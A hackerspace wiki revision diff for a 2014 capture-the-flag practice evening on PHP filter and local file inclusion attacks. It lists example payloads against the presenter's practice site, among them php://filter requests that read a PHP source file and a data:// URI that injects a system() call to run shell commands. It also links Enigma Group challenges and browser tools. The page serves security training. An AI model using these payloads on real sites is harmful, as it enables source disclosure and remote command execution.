Difference between revisions of "CTF-practice-evening:2014-06-23"

From Technologia Incognita
Jump to: navigation, search
(inserted a few spaces so crawlers don't hit these links and trip my IDS)
 
(5 intermediate revisions by one other user not shown)
Line 27: Line 27:
  
 
* Example of LFI attacks:
 
* Example of LFI attacks:
** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247.nl/20140623/index.php?page=php://filter/read=string.toupper/resource=secret.php'
+
** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247 .nl/20140623/index.php?page=php://filter/read=string.toupper/resource=secret.php'
** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247.nl/20140623/index.php?page=php://filter/convert.base64-encode/resource=secret.php'
+
** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247 .nl/20140623/index.php?page=php://filter/convert.base64-encode/resource=secret.php'
** http://coolfire.insomnia247.nl/20140623/index.php?page=data:text/plain;charset=utf-8%,%C%3Fsystem%28%24_GET[%27]%29%3B%3F%3E&inject=ls%20-la
+
** http://coolfire.insomnia247 .nl/20140623/index.php?page=data:text/plain;charset=utf-8%,%C%3Fsystem%28%24_GET[%27]%29%3B%3F%3E&inject=ls%20-la
 
** ( expect:// )
 
** ( expect:// )
 
** arrays: /index.php?page[]=A&page[]=B
 
** arrays: /index.php?page[]=A&page[]=B
  
= Enigma gropu PHP hash cracker =  
+
= Enigma group PHP challenges =  
  
* http://www.enigmagroup.org/forums/login
+
* http://www.enigmagroup.org/missions/basics/auditing/1/
 +
** (You have to create an account, and login to access this page!)
 +
 
 +
* Coolfire is using hackbar to supply the queries:
 +
** https://addons.mozilla.org/en-US/firefox/addon/hackbar/
 +
 
 +
* And Live HTTP Headers to view/manipulate the headers:
 +
** https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
 +
 
 +
* We solved challenges 1-11 together on the beamer!    :-)

Latest revision as of 08:56, 21 May 2015

CTF-practice-evening:2014-06-23
Date 2014/06/23
Time
Location ACTA
Type Workshop
Contact Melanie

Capture The Flag evening - Part 20

  • 23 June, 2014 - 7 PM
  • Please bring along a laptop with you!!!

General CTF Info

PHP Filter attacks

  • Coolfire is providing the content for this evening!  :-)
  • PHP commands:
    • php://input
    • output
    • df
    • memory
    • temp
    • filter
  • Example of LFI attacks:
    • 'php://filter LFI curl -X GET 'http://coolfire.insomnia247 .nl/20140623/index.php?page=php://filter/read=string.toupper/resource=secret.php'
    • 'php://filter LFI curl -X GET 'http://coolfire.insomnia247 .nl/20140623/index.php?page=php://filter/convert.base64-encode/resource=secret.php'
    • http://coolfire.insomnia247 .nl/20140623/index.php?page=data:text/plain;charset=utf-8%,%C%3Fsystem%28%24_GET[%27]%29%3B%3F%3E&inject=ls%20-la
    • ( expect:// )
    • arrays: /index.php?page[]=A&page[]=B

Enigma group PHP challenges

  • We solved challenges 1-11 together on the beamer!  :-)